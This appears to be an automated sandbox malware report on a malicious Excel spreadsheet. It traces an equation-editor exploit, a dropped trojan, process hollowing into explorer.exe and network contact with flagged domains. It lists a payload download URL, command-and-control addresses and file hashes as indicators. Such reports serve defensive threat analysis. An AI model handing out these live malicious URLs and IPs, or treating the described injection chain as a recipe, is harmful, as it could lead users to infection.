Source: explorer.exe, 00000006.00000000.482466146.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.535363042.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.466394211.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.489035937.0000000000750000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager<
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information

Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.4e0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000000.460837638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.503935653.0000000000530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.668987103.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.495106003.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.488208515.00000000097E3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.669043733.0000000000220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.463214486.00000000004E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.669096973.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.505448080.0000000002380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.503909309.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.461534405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (listed per tactic; the number in parentheses after a technique is the signature count badge shown in the matrix, techniques without a number had no matching signature)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Native API (11); Shared Modules (1); Exploitation for Client Execution (13); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (612); Extra Window Memory Injection (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (111); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (2); Process Injection (612); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (1); Extra Window Memory Injection (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (221); Virtualization/Sandbox Evasion (2); Process Discovery (2); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (14); Network Sniffing; Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (14); Non-Application Layer Protocol (3); Application Layer Protocol (123); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data
Behavior Graph (ID: 562479, Sample: W6902.xlsx, Start date: 28/01/2022, Architecture: WINDOWS, Score: 100). The numbers in square brackets after a process name are the count badges shown on the graph node.

Sample-level nodes: www.frentags.art; Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures

EXCEL.EXE [33 27] started
EQNEDT32.EXE [12] started
• Network: 212.192.246.120, 49165, 80 RHC-HOSTINGGB Russian Federation
• Dropped: C:\Users\user\AppData\Local\...\gntek[1].exe, PE32
• Dropped: C:\Users\Public\vbc.exe, PE32
• Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
• vbc.exe [19] started
  • Dropped: C:\Users\user\AppData\Local\Temp\...\npsx.dll, PE32
  • Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); 2 other signatures
  • vbc.exe started
    • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    • explorer.exe injected
      • Network: www.teentykarm.quest 37.123.118.150, 49167, 80 UK2NET-ASGB United Kingdom
      • Network: www.927291.com 1.32.255.137, 49166, 80 BCPL-SGBGPNETGlobalASNSG Singapore
      • Network: 5 other IPs or domains
      • Signature: System process connects to network (likely due to code injection or exploit)
      • msdt.exe started
        • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        • cmd.exe started
          No Antivirus matches
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gntek[1].exe | 100% | Joe Sandbox ML |
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gntek[1].exe | 35% | ReversingLabs | Win32.Trojan.Risis
C:\Users\user\AppData\Local\Temp\nsjBE61.tmp\npsx.dll | 46% | ReversingLabs | Win32.Trojan.Midie
C:\Users\Public\vbc.exe | 35% | ReversingLabs | Win32.Trojan.Risis
Source | Detection | Scanner | Label
7.2.msdt.exe.2b1796c.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
5.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.vbc.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
4.2.vbc.exe.4e0000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.vbc.exe.400000.4.unpack | 100% | Avira | TR/Patched.Ren.Gen2
5.0.vbc.exe.400000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen2
5.0.vbc.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
5.0.vbc.exe.400000.3.unpack | 100% | Avira | TR/Patched.Ren.Gen2
5.0.vbc.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.vbc.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
7.2.msdt.exe.41fb58.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
5.0.vbc.exe.400000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          No Antivirus matches
Source | Detection | Scanner | Label
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
http://www.zoharfine.com/b80i/?SZ5TuL=WIyhNSWdz3ksnrxMd9FPgtApU7fAeJTF2OsSNfT/loR2Vp0doC/CWPkVmL0jl9ASIxbbNA==&bZ30xx=0lLLAPA89 | 100% | Avira URL Cloud | malware
http://www.mollyagee.com/b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&bZ30xx=0lLLAPA89 | 100% | Avira URL Cloud | malware
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://treyresearch.net | 0% | URL Reputation | safe
http://java.sun.com | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
www.dreamschools.online/b80i/ | 100% | Avira URL Cloud | phishing
http://www.teentykarm.quest/b80i/?SZ5TuL=J+u8pU8GtC7Crrbw9NxHruIy2NemieD/+UtpUO8UjTwhviPWCSXqrJc4wu/Y5neCzW0Lig==&bZ30xx=0lLLAPA89 | 100% | Avira URL Cloud | malware
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.927291.com/b80i/?SZ5TuL=UugCFIKTrsouekFBGpmjj1lYYuG7Sqq7seOoZgmvymuhpKhoJBysXVQ1tfM8JEdSTWsNrA==&bZ30xx=0lLLAPA89 | 100% | Avira URL Cloud | malware
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
http://212.192.246.120/gntek.exe | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.teentykarm.quest | 37.123.118.150 | true | true | | unknown
ghs.googlehosted.com | 172.217.168.19 | true | false | | unknown
www.frentags.art | 44.227.76.166 | true | false | | unknown
www.927291.com | 1.32.255.137 | true | true | | unknown
zoharfine.com | 194.5.156.29 | true | true | | unknown
www.zoharfine.com | unknown | unknown | true | | unknown
www.mollyagee.com | unknown | unknown | true | | unknown
www.youngliving1.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.zoharfine.com/b80i/?SZ5TuL=WIyhNSWdz3ksnrxMd9FPgtApU7fAeJTF2OsSNfT/loR2Vp0doC/CWPkVmL0jl9ASIxbbNA==&bZ30xx=0lLLAPA89 | true | Avira URL Cloud: malware | unknown
http://www.mollyagee.com/b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H+/I9n3Xzt0JsmTA==&bZ30xx=0lLLAPA89 | false | Avira URL Cloud: malware | unknown
www.dreamschools.online/b80i/ | true | Avira URL Cloud: phishing | low
http://www.teentykarm.quest/b80i/?SZ5TuL=J+u8pU8GtC7Crrbw9NxHruIy2NemieD/+UtpUO8UjTwhviPWCSXqrJc4wu/Y5neCzW0Lig==&bZ30xx=0lLLAPA89 | true | Avira URL Cloud: malware | unknown
http://www.927291.com/b80i/?SZ5TuL=UugCFIKTrsouekFBGpmjj1lYYuG7Sqq7seOoZgmvymuhpKhoJBysXVQ1tfM8JEdSTWsNrA==&bZ30xx=0lLLAPA89 | true | Avira URL Cloud: malware | unknown
http://212.192.246.120/gntek.exe | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://investor.msn.com | explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | vbc.exe, 00000004.00000002.463015325.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.453577299.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000005.00000000.458701444.0000000000409000.00000008.00000001.01000000.00000003.sdmp, gntek[1].exe.2.dr, vbc.exe.2.dr | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://treyresearch.net | explorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://java.sun.com | explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://mollyagee.remax.com/b80i/?SZ5TuL=XkBoiSzcHlsmqFkYMGKyxhKE5R0ucNDlHWw1mrTAF5aGMvlxAg1/o3H | msdt.exe, 00000007.00000002.669852411.0000000002C92000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.icra.org/vocabulary/. | explorer.exe, 00000006.00000000.469773360.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000006.00000000.489156075.0000000001BE0000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | vbc.exe, vbc.exe, 00000004.00000002.463015325.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.453577299.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000005.00000000.458701444.0000000000409000.00000008.00000001.01000000.00000003.sdmp, gntek[1].exe.2.dr, vbc.exe.2.dr | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.485165517.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.487661348.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.480526320.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540680733.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540596693.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.538461267.000000000460B000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://investor.msn.com/ | explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.485165517.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.487661348.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.478539396.00000000044E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.480526320.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.537917620.00000000044E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540680733.0000000008404000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.540596693.0000000008374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.538461267.000000000460B000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://computername/printers/printername/.printer | explorer.exe, 00000006.00000000.478937288.0000000004650000.00000002.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.%s.comPA | explorer.exe, 00000006.00000000.489156075.0000000001BE0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://support.mozilla.org | explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://servername/isapibackend.dll | explorer.exe, 00000006.00000000.491342843.0000000003E50000.00000002.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | low
IP | Domain | Country | ASN | ASN Name | Malicious
212.192.246.120 | unknown | Russian Federation | 205220 | RHC-HOSTINGGB | true
1.32.255.137 | www.927291.com | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | true
37.123.118.150 | www.teentykarm.quest | United Kingdom | 13213 | UK2NET-ASGB | true
172.217.168.19 | ghs.googlehosted.com | United States | 15169 | GOOGLEUS | false
194.5.156.29 | zoharfine.com | Germany | 47583 | AS-HOSTINGERLT | true
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 562479
Start date: 28.01.2022
Start time: 22:36:09
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 51s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: W6902.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@9/24@6/5
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 40.5% (good quality ratio 38.6%)
• Quality average: 70.7%
• Quality standard deviation: 29%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Not all processes were analyzed, report is missing behavior information
• VT rate limit hit for: W6902.xlsx
Time | Type | Description
22:36:38 | API Interceptor | 42x Sleep call for process: EQNEDT32.EXE modified
22:36:46 | API Interceptor | 35x Sleep call for process: vbc.exe modified
22:37:05 | API Interceptor | 164x Sleep call for process: msdt.exe modified
22:37:57 | API Interceptor | 1x Sleep call for process: explorer.exe modified
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:downloaded
                                                      Size (bytes):254186
                                                      Entropy (8bit):7.930341504736443
                                                      Encrypted:false
                                                      SSDEEP:6144:owKdM+LrFcBAEMQK74gFWVE2BvubTUe+xdemO+:uHLrODMV4zVfvubb+L1
                                                      MD5:C2CA2BA9C38EB02217588662717BA6C3
                                                      SHA1:8A897F24D2E564AF2C2FCC272AB0CFBEF10611B5
                                                      SHA-256:9AF4D9EF8B2A850854AE23411D44D3603147C26898BCA1010FD2F9B16F6D456E
                                                      SHA-512:7C7A80F37013B8B5FE27E0C9C3144884ABDE6CA49484C3E8C6CC78DAA9F3B6AC890577247223E7D4875B865244E8732840C6A47170FBE2C7F27406BA4C8F52A6
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 35%
                                                      Reputation:low
                                                      IE Cache URL:http://212.192.246.120/gntek.exe
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):5396
                                                      Entropy (8bit):7.915293088075047
                                                      Encrypted:false
                                                      SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                                                      MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                                                      SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                                                      SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                                                      SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):11303
                                                      Entropy (8bit):7.909402464702408
                                                      Encrypted:false
                                                      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                      Malicious:false
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):3747
                                                      Entropy (8bit):7.932023348968795
                                                      Encrypted:false
                                                      SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                                      MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                                      SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                                      SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                                      SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                                      Malicious:false
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):10202
                                                      Entropy (8bit):7.870143202588524
                                                      Encrypted:false
                                                      SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                      MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                      SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                      SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                      SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                      Malicious:false
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                                      Category:dropped
                                                      Size (bytes):4396
                                                      Entropy (8bit):7.884233298494423
                                                      Encrypted:false
                                                      SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                                      MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                                      SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                                      SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                                      SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                                      Malicious:false
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                      Category:dropped
                                                      Size (bytes):1099960
                                                      Entropy (8bit):2.0153836624759336
                                                      Encrypted:false
                                                      SSDEEP:3072:LXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:RahIFdyiaT2qtXl
                                                      MD5:9CF22C4EBFAE36D30FABB19131DA97C9
                                                      SHA1:DBC31C309645F444F5B0B1062185CA4529BC8BF5
                                                      SHA-256:0FC72744A15E95D73D1441DAD1811B6D4B434966C5035C2F13318E426A9511B4
                                                      SHA-512:4E054657A67A89CB79763EFD9FE2D474E403BC114E5C559382B7EAA4C5EF2DBE49647C15EE9289581C223B56E93A1ADBAC43396A4459692DF810838EFECDE509
                                                      Malicious:false
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2647
                                                      Entropy (8bit):7.8900124483490135
                                                      Encrypted:false
                                                      SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                                                      MD5:E46357D82EBC866EEBDA98FA8F94B385
                                                      SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                                                      SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                                                      SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                                                      Malicious:false
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):5249
                                                      Entropy (8bit):6.1160379955388935
                                                      Encrypted:false
                                                      SSDEEP:96:HE4FTINLY3hqAntRxvviaXlUvIz51HicLVHpoGr8m0uTfKo234O1pLF:LONLMhqAnTxvvia0K39pNrn0MSo2344F
                                                      MD5:61327A82DC5ACFC628A9DDC93B1EDC0A
